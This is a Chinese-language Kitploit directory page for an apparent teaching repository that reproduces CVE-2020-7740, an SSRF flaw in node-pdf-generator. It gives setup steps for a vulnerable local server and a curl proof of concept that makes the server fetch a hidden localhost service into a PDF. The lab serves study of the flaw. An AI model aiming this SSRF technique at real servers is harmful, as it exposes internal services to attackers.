Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
node-pdf-generator-ssrf — CVE-2020-7740 的一个示例 | Kitploit
工具/GitHubGitHub/cs4239-u6/node-pdf-generator-ssrf
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHubcs4239-u6/node-pdf-generator-ssrf

node-pdf-generator-ssrf

CVE-2020-7740 的一个示例

查看仓库
114年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-7740

此漏洞影响所有版本的包 node-pdf-generator。由于缺乏对提供给 node-pdf-generator 内容的用户输入验证和清理,攻击者可以构造一个 URL 传递给外部服务器,从而实现 SSRF 攻击。

Source

使用 Docker 快速开始

  1. 构建容器。
  2. 运行容器:docker run -p 3000:3000 cve-2020-7740
  3. 注意到我们无法直接访问 localhost:3001
  4. 使用 curl 发送请求:curl --location --request GET localhost:3000/test --data-raw http://localhost:3001 --output test.pdf
  5. 查看 test.pdf 以查看本应隐藏的本地主机网站。

不使用 Docker 快速开始

  1. 使用 git clone {link to be inserted} 克隆项目。
  2. 从 https://wkhtmltopdf.org/ 安装依赖。
  3. 使用 node .\NodePdfGeneratorServer 启动服务器,服务器将在 localhost:3000 运行。
  4. 使用 python3 -m pip install -r requirements.txt 安装隐藏的 Python 服务器的依赖。
  5. 使用 python3 HiddenService 启动隐藏服务器,服务器将在 localhost:3001 运行。

工作原理

  1. 向服务器发送一个带有请求体的 GET 请求。可以使用以下命令发送:curl --location --request GET localhost:3000/test --data-raw http://www.google.com --output test.pdf
  2. 这将把 http://www.google.com 的 HTML 页面副本保存到文件 test.pdf 中。

为何存在漏洞?

  1. 提供给服务器的其他 URL 将被服务器访问,以便将网站转换为 PDF。
  2. 这使得用户可以通过向服务器提供一个内部 IP 地址作为目标,从而伪造服务器请求。

关于 CVE-2020-7740 的更多信息

  1. Vicarius.io
  2. NVD
  3. 原始仓库
下载工具